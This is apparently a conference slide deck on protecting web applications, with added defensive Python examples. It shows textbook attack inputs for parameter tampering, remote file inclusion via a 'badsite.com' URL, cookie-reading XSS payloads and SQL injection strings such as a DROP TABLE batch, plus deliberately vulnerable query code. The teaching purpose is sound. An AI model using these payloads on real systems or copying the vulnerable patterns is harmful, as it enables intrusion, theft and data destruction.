Learn about web applications, common vulnerabilities, and how to protect against them, including top attacks and questions answered.
Protecting Against Common Web Application Vulnerabilities
Alaa Al-Bahrani, Regional Cyber Security Leader, GE
Agenda
01 What are web applications?
02 How do web applications work?
03 Top attacks against web applications
04 Common vulnerabilities in web applications
05 How to protect against web application vulnerabilities
06 Questions (Q&A)
Web Applications
• Application hosted on a web server
• Accessed by a web browser
• Connects to a database backend
• Favored by many organizations
• Vulnerable to attacks!
How They Work
[Diagram: Web Browser → Internet → Web Server → Web Application → Database, with 3rd-party components alongside the web application]
Top Web Application Attacks
[Chart; source: www.ptsecurity.com]
CMS Market Share (Content Management Systems)
• WordPress 60%
• Joomla 6.5%
• Drupal 4.6%
Source: w3techs.com, January 2018
Around 27% of the Internet is powered by WordPress, which means approximately 75 million websites are currently running WordPress as a CMS. (Source: www.whoishostingthis.com)
WordPress Vulnerabilities
2407 vulnerabilities (Source: www.wpwhitesecurity.com)
Common Vulnerabilities
• Parameter Tampering
• Command Injection
• SQL Injection
• Cross-Site Scripting (XSS)
Parameter Tampering Attack
Definition: Manipulation of parameters exchanged between client and server in order to modify application data.
URL parameters (each pair shows the legitimate request followed by the tampered one):
• www.attackbank.com/default.asp?profile=741&debit=1000
• www.attackbank.com/default.asp?profile=741&debit=2000
• www.attackbank.com/savepage.asp?id=147&status=read
• www.attackbank.com/savepage.asp?id=147&status=delete
Hidden fields:
<input type="hidden" id="1008" name="cost" value="70.00">
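The defence against both forms of tampering on this slide is the same: the server decides ownership, limits and prices from its own state and treats the URL parameters and hidden fields as untrusted hints. The following is an added example, not code from the slides; the session table, balances, catalogue and function names are constructed for illustration.

```python
# Added example, not from the slides: server-side handling of the requests
# shown above. Session table, account balances and catalogue are constructed
# sample data; the function names are assumptions for illustration.
from decimal import Decimal

SESSION_OWNER = {"sess-abc": 741}                            # session token -> profile id
ACCOUNTS = {741: Decimal("1500.00"), 742: Decimal("90.00")}  # profile id -> balance
CATALOGUE = {1008: Decimal("70.00")}                         # item id -> authoritative price


class TamperingError(Exception):
    """Raised when a client-supplied parameter contradicts server-side state."""


def debit(session, profile_param, debit_param):
    """Handle default.asp?profile=...&debit=... : ownership and limits are
    decided from server-side state; the URL values are only untrusted input."""
    try:
        profile = int(profile_param)
        amount = Decimal(debit_param)
    except (ValueError, ArithmeticError):
        raise TamperingError("malformed parameter")
    if not amount.is_finite():                 # rejects NaN / Infinity
        raise TamperingError("malformed parameter")
    # The profile named in the URL must be the one bound to the logged-in session.
    if SESSION_OWNER.get(session) != profile:
        raise TamperingError("profile does not belong to this session")
    if amount <= 0 or amount > ACCOUNTS[profile]:
        raise TamperingError("amount out of range")
    ACCOUNTS[profile] -= amount
    return ACCOUNTS[profile]


def debit_request(session, profile_param, debit_param):
    """Request-handler view of debit(): ("ok", new balance) or ("rejected", why)."""
    try:
        return ("ok", str(debit(session, profile_param, debit_param)))
    except TamperingError as err:
        return ("rejected", str(err))


def checkout(item_id_param, cost_param):
    """Handle the hidden <input name="cost" value="70.00">: the submitted cost is
    never used for pricing; the catalogue price is the only source of truth."""
    item_id = int(item_id_param)
    price = CATALOGUE[item_id]
    if Decimal(cost_param) != price:
        # A changed hidden field is a tampering signal worth logging.
        print(f"tampering suspected: item {item_id} submitted {cost_param}, catalogue {price}")
    return str(price)


if __name__ == "__main__":
    print(debit_request("sess-abc", "741", "1000"))    # ok, balance 500.00
    print(debit_request("sess-abc", "741", "2000"))    # rejected: amount out of range
    print(debit_request("sess-abc", "742", "10"))      # rejected: not this session's profile
    print(checkout("1008", "1.00"))                    # 70.00, catalogue price wins
```

The point of `checkout` is that a hidden field carrying a price is at best a display value: the server already knows the price, so it should look it up again and treat a mismatch as a signal, not as an order.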
Injection Attacks
Definition: Unsolicited commands and data are passed to the web application because its input is not validated.
• www.attackbank.com/index.php?page=members.php
• www.attackbank.com/index.php?page=http://badsite.com/attack.php
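The `page=` parameter above is included by the application as a file name, so the fix is to validate it against an allowlist of known pages rather than to try to filter out bad values. This is an added example, not the slides' code; the allowlist, the pages directory and the function name are assumptions.

```python
# Added example, not from the slides: allowlisting the ?page= parameter
# instead of including whatever path or URL the client names.
from pathlib import Path

# Constructed: the only pages the application is allowed to include.
ALLOWED_PAGES = {
    "members": "members.php",
    "home": "index_body.php",
    "contact": "contact.php",
}
PAGES_DIR = Path("/var/www/app/pages")  # assumption: where the include files live


def resolve_page(page_param):
    """Map a client-supplied page name to a file under PAGES_DIR, or None.

    Only bare allowlisted keys are accepted, so URLs, path separators, "..",
    null bytes and the like never reach the include call.
    """
    name = page_param.strip().lower()
    if name.endswith(".php"):            # accept "members.php" and "members" alike
        name = name[:-4]
    if name not in ALLOWED_PAGES:
        return None
    target = (PAGES_DIR / ALLOWED_PAGES[name]).resolve()
    # Belt and braces: the resolved path must still sit inside PAGES_DIR.
    if PAGES_DIR.resolve() not in target.parents:
        return None
    return str(target)


if __name__ == "__main__":
    for candidate in ("members.php", "MEMBERS", "http://badsite.com/attack.php", "../../etc/passwd"):
        print(f"{candidate!r:40} -> {resolve_page(candidate)}")
```

The allowlist, not a denylist of dangerous substrings, is what makes this robust: a new bypass encoding cannot appear in the allowlist, so it is rejected by default.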
Cross-Site Scripting (XSS)
Definition: Allows attackers to inject client-side scripts into web pages. The scripts are then executed once the client visits the vulnerable web page.
Types: Stored, Reflected
Attack flow (diagram: Hacker, Website, Victim):
01 The hacker injects the vulnerable website with malicious scripts to steal information from the victim's browser
02 When the victim accesses the vulnerable website, the malicious script executes
03 The malicious script sends the victim's information to the attacker
Cross-Site Scripting (XSS)
XSS using script in attributes:
<body onload=alert('test1')>
<b onmouseover=alert('Wufff!')>click me!</b>
<img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>
XSS using script via encoded URI schemes:
<IMG SRC=jAvascript:alert('test2')>
XSS using code encoding:
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg">
(the base64 payload decodes to <script>alert('test3')</script>)
Cross-Site Scripting (XSS) The same could be used to execute stored XSS attacks in guestbook entries, blog posts, and comments.
Cross-Site Scripting (XSS): Error Page Example
Request: http://testsite.test/file_which_not_exist
Response: Not found: /file_which_not_exist
Request: http://testsite.test/<script>alert("TEST");</script>
Response: Not found: / (but with the JavaScript code <script>alert("TEST");</script> reflected into the page)
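The error page above is vulnerable because the requested path is written into the HTML verbatim. The defence is output encoding chosen for the context the value lands in (HTML text, an attribute, or JavaScript). This is an added example, not the slides' code; the function names are assumptions, and the vulnerable renderer is kept only to show the contrast.

```python
# Added example, not from the slides: rendering the "Not found" page with
# context-aware output encoding so a reflected path cannot become script.
import html
import json


def not_found_vulnerable(path):
    """The behaviour described on the slide: the path is echoed verbatim."""
    return f"<p>Not found: {path}</p>"


def not_found_safe(path):
    """HTML text context: escape &, <, > and quotes before interpolating."""
    return f"<p>Not found: {html.escape(path, quote=True)}</p>"


def link_safe(path, label):
    """HTML attribute context: always quote the attribute AND escape its value."""
    return f'<a href="{html.escape(path, quote=True)}">{html.escape(label)}</a>'


def script_data_safe(value):
    """JavaScript context: serialize as JSON and escape '<' so a value
    containing '</script>' cannot close the enclosing script element."""
    return "var requested = " + json.dumps(value).replace("<", "\\u003c") + ";"


def contains_raw_tag(markup):
    """Crude regression check: True if an unescaped <script> tag survived."""
    return "<script" in markup.lower()


if __name__ == "__main__":
    reflected = '/<script>alert("TEST");</script>'   # the slide's request path
    print(not_found_vulnerable(reflected))             # script lands in the page
    print(not_found_safe(reflected))                   # rendered as harmless text
    print(link_safe(reflected, "retry"))
    print(script_data_safe(reflected))
```

Encoding on output rather than on input is what makes this hold for every source of the value, including the path, query string and stored data such as the guestbook and comment entries mentioned on the previous slide.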
SQL Injection
• The placement of malicious code in SQL statements via web page input
• It is a fault in the code of the web application, not the DBMS
• A successful SQL injection exploit can:
  • read sensitive data from the database
  • modify database data (Insert/Update/Delete)
  • execute administration operations on the database (e.g. shut down the DBMS)
  • recover the content of a given file present on the DBMS file system
  • issue commands to the operating system
Photo source: https://www.link-academy.com/blog/sql-injection-ghidul-celei-mai-utilizate-metode-de-atac
SQL Injection: 1=1 (Tautology) Example
stringUserID = getRequestString("User_ID");
stringSQL = "SELECT * FROM Users WHERE User_ID = " + stringUserID;
Input: 110 OR 1=1
Resulting query: SELECT * FROM Users WHERE User_ID = 110 OR 1=1;
SQL Injection: Batched SQL Statements Example
stringUserID = getRequestString("User_ID");
stringSQL = "SELECT * FROM Users WHERE User_ID = " + stringUserID;
Input: 110; DROP TABLE Suppliers
Resulting query: SELECT * FROM Users WHERE User_ID = 110; DROP TABLE Suppliers;
SQL Injection: Search Bar (UNION) Example
stringTitle = getRequestString("Title");
stringSQL = "SELECT * FROM Authors WHERE Title LIKE %" + stringTitle + "%";
Input: 1 UNION SELECT 1 FROM information_schema.tables --
Resulting query: SELECT * FROM Authors WHERE Title LIKE 1 UNION SELECT 1 FROM information_schema.tables --%
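All three examples above (tautology, batched statements, search bar) come from the same defect: the user's input is concatenated into the statement text. The following added example, which is not the slides' code, reproduces the concatenation against an in-memory SQLite database and places the parameterized version beside it; the tables, rows and function names are constructed for the demonstration.

```python
# Added example, not from the slides: the concatenation pattern from the
# slides beside its parameterized fix, run against a constructed SQLite database.
import sqlite3


def make_db():
    """Constructed sample schema: Users, Authors and the Suppliers table the
    batched payload on the slide tries to drop."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Users (User_ID INTEGER, Name TEXT);
        INSERT INTO Users VALUES (110, 'alice'), (111, 'bob'), (112, 'carol');
        CREATE TABLE Authors (Title TEXT);
        INSERT INTO Authors VALUES ('Web Security'), ('Databases');
        CREATE TABLE Suppliers (Name TEXT);
    """)
    return conn


def table_exists(conn, name):
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?", (name,)
    ).fetchone()
    return row is not None


def lookup_user_vulnerable(conn, user_id_param):
    """The slide's pattern, kept deliberately unsafe: input becomes SQL text."""
    sql = "SELECT * FROM Users WHERE User_ID = " + user_id_param
    return conn.execute(sql).fetchall()


def lookup_user_vulnerable_batched(conn, user_id_param):
    """Same concatenation on an API that runs several statements at once
    (sqlite3.executescript stands in for such a driver here), so a batched
    payload is executed along with the intended query."""
    conn.executescript("SELECT * FROM Users WHERE User_ID = " + user_id_param)


def lookup_user_safe(conn, user_id_param):
    """Parameterized query: the value is bound by the driver and never parsed
    as SQL. Converting to int first adds a type check as a second layer."""
    try:
        user_id = int(user_id_param)
    except ValueError:
        return []
    return conn.execute("SELECT * FROM Users WHERE User_ID = ?", (user_id,)).fetchall()


def search_authors_safe(conn, title_param):
    """LIKE with a bound parameter. The wildcards are added in code, and any
    % or _ typed by the user is escaped so it cannot widen the search."""
    escaped = (title_param.replace("\\", "\\\\")
                          .replace("%", "\\%")
                          .replace("_", "\\_"))
    return conn.execute(
        "SELECT * FROM Authors WHERE Title LIKE ? ESCAPE '\\'", (f"%{escaped}%",)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(lookup_user_vulnerable(db, "110"))            # one row
    print(lookup_user_vulnerable(db, "110 OR 1=1"))     # every row: tautology
    print(lookup_user_safe(db, "110 OR 1=1"))           # [] : not an integer
    lookup_user_vulnerable_batched(db, "110; DROP TABLE Suppliers")
    print(table_exists(db, "Suppliers"))                # False: batch executed
    print(search_authors_safe(db, "Web"))               # [('Web Security',)]
    print(search_authors_safe(db, "%"))                 # [] : wildcard neutralized
```

Note that `sqlite3`'s `execute()` refuses more than one statement per call, which is why the batched case is shown through `executescript()`; many other drivers and database servers accept batched statements by default, which is exactly what the slide's `DROP TABLE` payload relies on. Parameter binding removes the problem at its root for every variant, including the `UNION` in the search bar, because the bound value can only ever be compared, never executed.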
SQL Injection
• Many tools automate SQL injection attacks
• Any input field can be used:
  • Login form
  • Search bar
  • Newsletter registration
  • etc.
Defense in Depth (layers, outermost to innermost)
• Physical Security
• Network
• Operating System
• Web Server
• Database
• 3rd Party Components
• Web Application
Protecting Your Web Application
• Input Validation
• Code Testing
Web Application Firewall
[Diagram: Web Browser → Internet → Web Application Firewall (WAF) → Web Server → Web Application → Database, with 3rd-party components alongside the web application]
Honeypots
• Honeypots are security systems used to detect and divert attacks
• They replicate system services such as web services
• They allow collecting more information about the attack
Photo source: https://www.carnaghan.com/honeypots-to-lure-or-not-to-lure/
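The "detect and divert" role of a honeypot can be shown with the simplest variant: decoy paths that the real application never links to, so any request for them is suspicious by construction. The following is an added example, not from the slides; the log lines are constructed (documentation IP ranges), and the decoy paths, threshold and function names are assumptions.

```python
# Added example, not from the slides: detecting hits on honeypot decoy paths
# in a web server access log and deciding which clients to divert.
import re
from collections import defaultdict

# Constructed sample access log (Common Log Format style); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2018:10:00:01 +0000] "GET /index.php?page=members HTTP/1.1" 200 512
203.0.113.5 - - [10/Jan/2018:10:00:02 +0000] "GET /wp-login.php HTTP/1.1" 200 128
198.51.100.7 - - [10/Jan/2018:10:00:03 +0000] "GET /index.php?page=home HTTP/1.1" 200 640
203.0.113.5 - - [10/Jan/2018:10:00:04 +0000] "POST /wp-login.php HTTP/1.1" 200 128
198.51.100.7 - - [10/Jan/2018:10:00:05 +0000] "GET /phpmyadmin/ HTTP/1.1" 200 128
"""

# Decoy paths served by the honeypot with harmless static content. The real
# application never references them, so legitimate users never request them.
DECOY_PATHS = {"/wp-login.php", "/phpmyadmin/", "/backup.zip"}

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status = m.groups()
    return {
        "ip": ip,
        "time": ts,
        "method": method,
        "path": target.split("?", 1)[0],   # compare the path, ignore the query string
        "status": int(status),
    }


def decoy_hits(log_text):
    """Return {ip: [(time, method, path), ...]} for requests to decoy paths."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["path"] in DECOY_PATHS:
            hits[rec["ip"]].append((rec["time"], rec["method"], rec["path"]))
    return dict(hits)


def should_divert(ip, hits, threshold=2):
    """Policy (assumed): after `threshold` decoy hits, route this client's
    further requests to the honeypot (for example via the WAF) instead of
    the production application, and keep collecting what it does there."""
    return len(hits.get(ip, [])) >= threshold


if __name__ == "__main__":
    found = decoy_hits(SAMPLE_LOG)
    for ip, events in found.items():
        print(ip, "divert" if should_divert(ip, found) else "watch", events)
```

Because the decoy paths carry no legitimate traffic, this detection has essentially no false positives, which is what makes the diversion decision safe to automate; the collected request details are the "more information about the attack" the slide refers to.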
Thank You